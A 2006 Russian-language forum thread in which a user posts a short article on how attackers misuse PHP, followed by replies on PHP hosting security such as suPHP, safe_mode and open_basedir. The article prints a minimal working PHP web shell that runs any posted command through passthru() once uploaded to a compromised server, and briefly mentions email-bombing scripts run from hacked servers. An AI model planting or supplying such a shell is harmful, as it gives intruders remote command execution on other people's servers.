Модераторы: LSD

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> PHP в руках хакера, статья 
:(
    Опции темы
st1ng3r
  Дата 14.6.2006, 23:54 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 214
Регистрация: 4.5.2006
Где: Саратов







/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\
|*                                       PHP в руках хакера.                                  *|
|*       © Stinger a.k.a. Crible                                                                *|
\*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/



  

<|------------------------|>
<|*Содержание:      |>
<|------------------------|>

 
*1 Глава]> Предисловие
*2 Глава]> Примеры
*3 Глава]> Вывод
*4 Глава]> Заключение

|*-------------------------------------------------------------------*|

Предисловие

|*-------------------------------------------------------------------*|

Здравствуйте. Как-то раз, сидя на своём любимом канале #vingrad  
один чел поднял тему web-администрировании серверов. Оказалось что 
большинство людей отказываються от использования языка Perl
на своих серверах и предпочитают PHP. Я внимательно следил за 
разговором и причиной оказалась Безопасность. Цитирую одного
зачинщика разговора:
"Дело в том, что в интернете куча сценариев на Perl, которые
позволяют упростить взлом хакерам. При этом достаточно иметь 
минимальные права в системе."
Я немного задумался. А ведь и вправду. Эксплойтов на PHP 
гораздо меньше чем на Perl. Но это не значит что 
PHP безопаснее чем Perl. Впринципе любой язык программирования,
будь то PHP или Perl или С++, опасен в руках неопытного 
программиста-новичка...Именно об этом сегодня я вам и расскажу.
Статья будет посвящена PHP, или что такое PHP в руках хакера.

|*-------------------------------------------------------------------*|

Примеры

|*-------------------------------------------------------------------*|

Тот факт что в PHP мало хакерских утилит, никого не остановит.
Например хакер получил доступ к ftp, ему достаточно создать 
такой сценарий:

Код

<form action="system.php" method="post">
<textarea rows=1 cols=80 name="cmd"></textarea><input type="submit" value="Execute">
<?
echo "<hr>";
echo "<pre>";
passthru($_POST['cmd']);
echo "</pre>";
echo "<hr>";
?>


Загрузив этот сценарий, хакер получит доступ к выполнению команд на
удалённом серваке с правами Web-сервера. Если наделить этот 
сценарий функциям работы с файлами то уже можно будет назвать
настоящим Shell доступом. 
Shell - оболочка для выполнения команд на удалённой системе.

Также можно например написать за 5 минут PHP сценарий который
будет бомбить опеределённый E-Mail. Для этого нужны минимальные
знания в PHP, и даже новичок который неплохо разбираеться в работе 
с электронной почтой и функцией mail() может написать такой вот
сценарий. Ну а если ещё и хакер взломав сервер с широким каналом 
разместит там этот сценарий, вот тогда начнёться настоящий хаос.
Использование взломанного сервера позволяет хакеру оставаться 
анонимным. Для этого потребуеться анонимный proxy-сервер который 
будет скрывать реальный IP.

|*-------------------------------------------------------------------*|


Вывод

|*-------------------------------------------------------------------*|

Возможно языки программирования для web-серверов удобны для
создания сайтов, но в руках хакеров они являються грозным оружием.
Борьба людей с нестандартным складом ума против сис.администраторов
будет вечной. Профессионалы в области ИТ должны использовать
свои знания во благо общества, а не во зло.
Мне было бы очень интересно посмотреть на хакера который забыл 
исправить ошибку в коде и торопливо залил файл на сервер пойдя
пить пиво, и придя , зашедши на свой сайт проверить как он, вместо
привычного - "Привет Вася Пупкин" видит - "Fuck you nigga'z".
Мдя, сайт ломанули обычные дети, через локальный include.
Наверное теперь, "хакер" призадумаеться над СВОИМИ действиями.
"А почему так???" И возможно перейдёт со стороны Хака на сторону 
Security! Лично я отношусь ко второму. Я за безопасный код!

|*-------------------------------------------------------------------*|

Заключение

|*-------------------------------------------------------------------*|

Думаю что эта статья будет полезна для новичков программистов 
которые творя тысячи код кода не на каплю не задумываеються о 
безопасности. А ведь надо. Ктомуже если вы программируете на PHP,
столь гибком и опасном языке вам просто необходимо это делать!
Незнаю как вы, но я живу под эгидой: 
"Безопасность превыше всего!"

|*-------------------------------------------------------------------*|

© Stinger a.k.a. Crible
Особую благодарность в помощи по написанию статьи я выражаю
человеку под ником Tellur. Он помог в составлении примеров 
PHP сценариев и вдохновлению на написание статьи.


|*-------------------------------------------------------------------*|
   

продолжение следует...
 

Это сообщение отредактировал(а) st1ng3r - 15.6.2006, 01:49
--------------------
aka Crible  [.::My home page::.]-Мой FAQ на тему IRC!Я люблю BMX  
PM MAIL WWW ICQ   Вверх
Рыжий
Дата 15.6.2006, 00:59 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Помешанный
***


Профиль
Группа: Завсегдатай
Сообщений: 1423
Регистрация: 19.9.2004




воды много налил, мало фактов. smile  
PM MAIL ICQ   Вверх
DezmASter
Дата 15.6.2006, 01:11 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Дизайнер :)
***


Профиль
Группа: Участник
Сообщений: 1520
Регистрация: 3.2.2006
Где: Украина, Запорожь е




Ничего так. Сойдет - обещаю эта статья будет включена в первый выпуск журнала Oxygen 
PM WWW ICQ Skype GTalk Jabber   Вверх
st1ng3r
Дата 15.6.2006, 01:22 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 214
Регистрация: 4.5.2006
Где: Саратов




DezmASter , спасибо!
Рыжий, что посоветуешь добавить? 
--------------------
aka Crible  [.::My home page::.]-Мой FAQ на тему IRC!Я люблю BMX  
PM MAIL WWW ICQ   Вверх
Рыжий
Дата 15.6.2006, 01:29 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Помешанный
***


Профиль
Группа: Завсегдатай
Сообщений: 1423
Регистрация: 19.9.2004




st1ng3r, не просто рассуждения о том, что может сделать хакер, а конкретно - как он это сделает и как от этого защититься. 
PM MAIL ICQ   Вверх
st1ng3r
Дата 15.6.2006, 01:43 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 214
Регистрация: 4.5.2006
Где: Саратов




Цитата

как он это сделает и как от этого защититься. 

 smile Гыгыгы, вся фишка в том что это будет уже следующая статья. Типа продолжение... 
--------------------
aka Crible  [.::My home page::.]-Мой FAQ на тему IRC!Я люблю BMX  
PM MAIL WWW ICQ   Вверх
Рыжий
Дата 15.6.2006, 01:54 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Помешанный
***


Профиль
Группа: Завсегдатай
Сообщений: 1423
Регистрация: 19.9.2004




st1ng3r, прежде как писать, прочти еще разок правила Винграда - там запрещено писать четкие хакерские методы. Просто постарайся как то всколзь их сказать smile 
PM MAIL ICQ   Вверх
st1ng3r
Дата 15.6.2006, 02:14 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 214
Регистрация: 4.5.2006
Где: Саратов




Каждый представленный мой скрипт будет таким, что только хакер или опытный php-coder сможет понять истинное его предназначение.
Так что с этим проблем не будет. Но вот с этим скриптом я обложался. Больше такого не повториться. 
--------------------
aka Crible  [.::My home page::.]-Мой FAQ на тему IRC!Я люблю BMX  
PM MAIL WWW ICQ   Вверх
Sun
Дата 15.6.2006, 09:19 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Account removed
***


Профиль
Группа: Экс. модератор
Сообщений: 1611
Регистрация: 14.8.2002




Цитата(st1ng3r @  14.6.2006,  20:54 Найти цитируемый пост)
Загрузив этот сценарий, хакер получит доступ к выполнению команд на
удалённом серваке с правами Web-сервера. Если наделить этот 
сценарий функциям работы с файлами то уже можно будет назвать
настоящим Shell доступом. .

Это если PHP выполняется из под процеса httpd, а это не есть хорошо. PHP должен как и CGI выполняться из под юзера - владельца документ рута. А там юзер вправе делать что угодно.

Гораздо опасней дыры в самом PHP. Не знаю откуда утверждение что под PHP мало эксплоитов - думаю это не так. Достаточно посмотреть с какой частотой выпускаются секьюрити патчи для популярных PHP продуктов - phpNuke, phpBB, osCommerce. Это настоящий геморой для админа, так как приходиться патчить это дело чуть ли не каждую неделю, а то и чаще. Да и в самом PHP регулярно находят секьюрити холы. 

Так что с утверждением что PHP более секьюрный чем CGI я не согласен. 


--------------------
Account removed
PM MAIL   Вверх
Wowa
Дата 15.6.2006, 16:45 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
Group Icon


Профиль
Группа: Админ
Сообщений: 15017
Регистрация: 14.9.2000
Где: Винград




Цитата(Sun @  15.6.2006,  08:19 Найти цитируемый пост)
Это если PHP выполняется из под процеса httpd, а это не есть хорошо. PHP должен как и CGI выполняться из под юзера - владельца документ рута. А там юзер вправе делать что угодно.

смотря с какой стороны смотреть. В плане производительности mod_php гораздо быстре, чем ПХП через CGI. 
PM WWW   Вверх
Sun
Дата 15.6.2006, 17:56 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Account removed
***


Профиль
Группа: Экс. модератор
Сообщений: 1611
Регистрация: 14.8.2002




Цитата(Wowa @  15.6.2006,  13:45 Найти цитируемый пост)

смотря с какой стороны смотреть. В плане производительности mod_php гораздо быстре, чем ПХП через CGI.  

Я не говорю о том чтобы запускать PHP как CGI, а о том чтобы запускать его не из под пользователя httpd, а из под того пользователя, который является владельцем документ рута  данного виртуального хоста, иначе ты получаешь неограниченный доступ к чужим документ рутам. 


--------------------
Account removed
PM MAIL   Вверх
TELLUR
Дата 15.6.2006, 18:48 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 3
Регистрация: 10.6.2006




Цитата(Sun @ 15.6.2006,  09:19)
Гораздо опасней дыры в самом PHP. Не знаю откуда утверждение что под PHP мало эксплоитов - думаю это не так. Достаточно посмотреть с какой частотой выпускаются секьюрити патчи для популярных PHP продуктов - phpNuke, phpBB, osCommerce. Это настоящий геморой для админа, так как приходиться патчить это дело чуть ли не каждую неделю, а то и чаще. Да и в самом PHP регулярно находят секьюрити холы. 

Я бы не стал так останавливаться на ПХП-Нюке и ПХПББ, потому что сейчас в последних версиях ПХПББ защищёнее бесплатного ИПБ, который ломается любым скрипт киддисом паблик сплойтом... А вообще дело не в языке программирования и его защищённости, а во внимательности и опыте программиста, потому что все возможные уязвимости можно закрыть.  
PM MAIL ICQ   Вверх
Wowa
Дата 15.6.2006, 19:20 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
Group Icon


Профиль
Группа: Админ
Сообщений: 15017
Регистрация: 14.9.2000
Где: Винград




Цитата(Sun @  15.6.2006,  16:56 Найти цитируемый пост)
Я не говорю о том чтобы запускать PHP как CGI, а о том чтобы запускать его не из под пользователя httpd, а из под того пользователя, который является владельцем документ рута  данного виртуального хоста

А как его можно запустить не из под пользователя апаче, когда mod_php является модулем апача?

Цитата(Sun @  15.6.2006,  16:56 Найти цитируемый пост)
иначе ты получаешь неограниченный доступ к чужим документ рутам. 

Не получаю. Нужно всего лишь включить safe_mode и прописать open_base_dir

Добавлено @ 19:21 
Цитата(TELLUR @  15.6.2006,  17:48 Найти цитируемый пост)
сейчас в последних версиях ПХПББ защищёнее бесплатного ИПБ

не знаю насчет ПХПББ, но в нашем форумском инвижионе мы столько уже дырок отловили и пофиксили, что вряд ли они поддаются счету. 
PM WWW   Вверх
TELLUR
Дата 15.6.2006, 19:37 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 3
Регистрация: 10.6.2006




Да, в публичных движках всегда приходится вносить изменения и поправлять баги. 
PM MAIL ICQ   Вверх
Sun
Дата 15.6.2006, 20:33 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Account removed
***


Профиль
Группа: Экс. модератор
Сообщений: 1611
Регистрация: 14.8.2002




Цитата(Wowa @  15.6.2006,  16:20 Найти цитируемый пост)
А как его можно запустить не из под пользователя апаче, когда mod_php является модулем апача?

Например так http://www.suphp.org/Home.html

Цитата(Wowa @  15.6.2006,  16:20 Найти цитируемый пост)
Не получаю. Нужно всего лишь включить safe_mode и прописать open_base_dir

safe_mode нередко отключают, потому что с ним не работают многие приложения. На хостингах это обычное дело smile 


--------------------
Account removed
PM MAIL   Вверх
Ответ в темуСоздание новой темы Создание опроса
Правила раздела «Флейм»
Sneg0k

Добро пожаловать в «Флейм».

В разделе не действуют многие правила:

  • Можно оффтопить(умеренно)
  • Можно общаться на темы, не только связанные с программированием.

Строго запрещено:

  • Размещать рекламу
  • Обсуждать политику
  • Оскорблять друг-друга и переходить на личности
  • Наезжать, провоцировать других участников форума
  • Материться
  • Троллить

Напоминаем о существовании волшебной кнопочки "Репорт". Если вы увидели сообщение, несовместимое с жизнью, просьба подвести на нее курсор и клацнуть левой клавишей мышки. Тем самым вы сможете призвать злого, но жутко справедливого джина-модератора, который нашлет порчу на злостного нарушителя. Кстати - счётчик сообщений здесь не растёт.


Глас Винграда:


Глас Философии:


Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, Sneg0k

 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | Флейм | Следующая тема »


 




[ Время генерации скрипта: 0.0724 ]   [ Использовано запросов: 21 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.